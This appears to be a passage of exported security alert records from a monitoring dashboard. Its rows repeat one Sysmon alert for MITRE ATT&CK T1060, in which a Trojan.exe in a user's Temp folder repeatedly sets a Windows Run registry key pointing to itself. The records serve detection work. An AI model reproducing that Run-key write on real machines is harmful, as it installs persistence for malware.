HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:37.353405000Z"",""eventRecordID"":""1060"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:37.335\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:37.335"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:49.475",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:36.320 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:36.334800800Z"",""eventRecordID"":""1059"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:36.320\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:36.320"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:47.454",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:35.288 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:35.292420700Z"",""eventRecordID"":""1058"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:35.288\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:35.288"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:47.439",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:34.273 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:34.291567400Z"",""eventRecordID"":""1057"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:34.273\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:34.273"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:46.367",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:33.226 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:33.228233200Z"",""eventRecordID"":""1056"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:33.226\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:33.226"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:45.381",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:32.211 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:32.212816800Z"",""eventRecordID"":""1055"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:32.211\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:32.211"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:45.365",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:31.194 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:31.211125700Z"",""eventRecordID"":""1054"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:31.194\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:31.194"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:45.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:30.163 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:30.165499200Z"",""eventRecordID"":""1053"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:30.163\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:30.163"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:42.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:28.976 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:28.978561800Z"",""eventRecordID"":""1052"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:28.976\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:28.976"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:41.068",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:27.960 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:27.963474200Z"",""eventRecordID"":""1051"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:27.960\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:27.960"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:40.068",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:26.929 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.932861800Z"",""eventRecordID"":""1050"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:26.929\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:26.929"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:39.037",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:25.914 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 